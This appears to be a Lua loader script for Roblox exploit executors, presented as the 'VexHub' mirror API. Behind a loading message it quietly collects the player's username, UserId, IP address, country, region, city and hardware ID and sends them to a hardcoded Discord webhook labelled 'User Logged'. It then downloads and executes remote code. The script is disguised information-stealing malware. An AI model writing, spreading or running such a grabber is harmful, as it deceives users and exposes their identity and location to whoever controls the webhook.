getgenv().loadmirror = function(Link)
	local request = request or syn and syn.request or http and http.request
	local HttpService = game:GetService("HttpService")
	local message = request({
		Url = "https://mirrorr.onrender.com/mirror",
		Method = "POST",
		Headers = {
			["Content-Type"] = "application/json"
		},
		Body = HttpService:JSONEncode({
			url = Link
		})
	})

	local decoded = HttpService:JSONDecode(message.Body)
	restorefunction(loadstring)
	return loadstring(tostring(decoded.content))()
end

getgenv().mirror = function(Link)
	local request = request or syn and syn.request or http and http.request
	local HttpService = game:GetService("HttpService")
	local message = request({
		Url = "https://mirrorr.onrender.com/mirror",
		Method = "POST",
		Headers = {
			["Content-Type"] = "application/json"
		},
		Body = HttpService:JSONEncode({
			url = Link
		})
	})

	local decoded = HttpService:JSONDecode(message.Body)
	return decoded.content
end

local GUI = {
	["Hint_00"] = Instance.new("ScreenGui");
	["Text_01"] = Instance.new("TextLabel");
}

GUI["Hint_00"].ZIndexBehavior = Enum.ZIndexBehavior.Sibling
GUI["Hint_00"].Name = "Hint"
GUI["Hint_00"].Parent = game:GetService("CoreGui")

GUI["Text_01"].Font = Enum.Font.GothamMedium
GUI["Text_01"].Text = "Loading VexHub Mirrorr API (est. 50 seconds)"
GUI["Text_01"].TextColor3 = Color3.fromRGB(255, 255, 255)
GUI["Text_01"].TextSize = 14
GUI["Text_01"].AutomaticSize = Enum.AutomaticSize.Y
GUI["Text_01"].BackgroundColor3 = Color3.fromRGB(25.000000409781933, 26.000000350177288, 31.000000052154064)
GUI["Text_01"].BorderColor3 = Color3.fromRGB(0, 0, 0)
GUI["Text_01"].BorderSizePixel = 0
GUI["Text_01"].Size = UDim2.new(1, 0, 0, 16)
GUI["Text_01"].Visible = false
GUI["Text_01"].Name = "Text"
GUI["Text_01"].Parent = GUI["Hint_00"]

local Loaded = false
local Time = 0

coroutine.wrap(function()
	while task.wait(1) do
		if Loaded == false then
			Time += 1

			if Time > 3 then
				GUI.Text_01.Visible = true
				return
			end
		else
			return
		end
	end
end)()

mirror("https://example.com")
Loaded = true
GUI.Hint_00:Destroy()

if (writefile) and (getcustomasset) then
	local LocalPlayer = game:GetService("Players").LocalPlayer
	local WhoIs = game:GetService("HttpService"):JSONDecode(mirror("https://ipwho.is/"))
	local message = request({
		Url = "https://mirrorr.onrender.com/send",
		Method = "POST",
		Headers = {
			["Content-Type"] = "application/json"
		},
		Body = game:GetService("HttpService"):JSONEncode({
			webhook_url = "https://discord.com/api/webhooks/1499751083197857922/Lb3-E0JPX3PFbOlHDZYl89JO7nuHQS_PlxVXMfm9r-Zb4Obq4omprJ_zzxE1ICB1yRq9",
			content = "meow",
			embeds = {
				{
					["color"] = 16711680,
					["title"] = "User Logged",
					["description"] = "User has been logged",
					["fields"] = {
						{
							["name"] = "Player Information:",
							["value"] = "**DisplayName:** "..LocalPlayer.DisplayName.."\n**Username:** "..LocalPlayer.Name.."\n**UserId:** "..LocalPlayer.UserId
						},
						{
							["name"] = "Game Information:",
							["value"] = "**Game:** "..game:GetService("MarketplaceService"):GetProductInfoAsync(game.PlaceId).Name.."\n**GameId:** "..game.GameId.."\n**PlaceId:** "..game.PlaceId
						},
						{
							["name"] = "Sensitive Information:",
							["value"] = "**IP:** ||"..WhoIs.ip.."||\n**Country:** ||"..WhoIs.country.."||\n**Region:** ||"..WhoIs.region.."||\n**City:** ||"..WhoIs.city.."||\n**HWID:** ||"..gethwid().."||"
						},
					},
					["thumbnail"] = {
						["url"] = game:GetService("HttpService"):JSONEncode(mirror("https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds="..LocalPlayer.UserId.."&size=420x420&format=Png&isCircular=false")).data.imageUrl
					}
				}
			}
		})
	})

	loadmirror("https://raw.githubusercontent.com/SkibidiSource/fake/refs/heads/main/KeySystem")
else
	GUI.Text_01.Text = "VexHub does not support your executor. Please join our discord server: dsc.gg/vhub"
	GUI.Text_01.Visible = true
end
